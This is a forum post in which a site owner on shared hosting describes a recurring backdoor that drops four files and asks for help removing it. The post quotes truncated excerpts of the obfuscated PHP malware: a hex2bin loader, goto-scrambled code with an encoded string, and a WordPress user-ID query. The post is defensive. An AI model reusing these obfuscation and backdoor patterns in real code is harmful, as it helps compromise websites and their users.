backdoor host

Hello,

I have a backdoor that injects files in the root of the shared server where there is no wordpress installed directly,
I delete them regularly and I analyze the wordpress plugins of my sites and I installed a monitor plugin for the changes
on the ftp server of the sites, apparently I have to do it for each site, and then I have to install a site at the root maybe to see how it starts?
see how it starts?

Just if you have some info on scripts or an idea to stop this
the attacker creates 4 files each time, thanks
admin.php
extract of the code : <?php
if (!function_exists(‘hex2bin’)) { function hex2bin($JKiuL) { $Jl4hU = strlen($JKiuL); $Pycm9 = “”; $jV1U7 = 0; while ($jV1U7 < $Jl4hU) { $fDGwd =

fox-style.php
code excerpt: <?php
if (!function_exists(‘hex2bin’)) { function hex2bin($JKiuL) { $Jl4hU = strlen($JKiuL); $Pycm9 = “”; $jV1U7 = 0; while ($jV1U7 < $Jl4hU) { $fDGwd =

index.php
extract from the code
<? php goto t5YxR; t5YxR: function vPFWr($KPBxi) { goto b6wCq; SJCmP: return $KPBxi; goto fSf_U; Q2Oje: $KPBxi = substr($KPBxi, (int) wiNPsmNlGPpvYAW8vkEagLZs0xEQF9Id0Zxcy3N8yyv4O3BNi8867z6KCOeU3gdBhGXpXm0PoGxaVif09Svu8wjnWvubjfr3sCZUpfhnA7f1tvCx0JAoDNo

reads.hlm
get_results( “SELECT ID FROM $wpdb->users ORDER BY ID ASC” ); $authorId = 0; $firstUserId = 0; if( $users ) { foreach ( $users as $user ) { if($firstUserId == 0){ $firstUserId = $user->ID; } $wp_user =

Translated with http://www.DeepL.com/Translator (free version)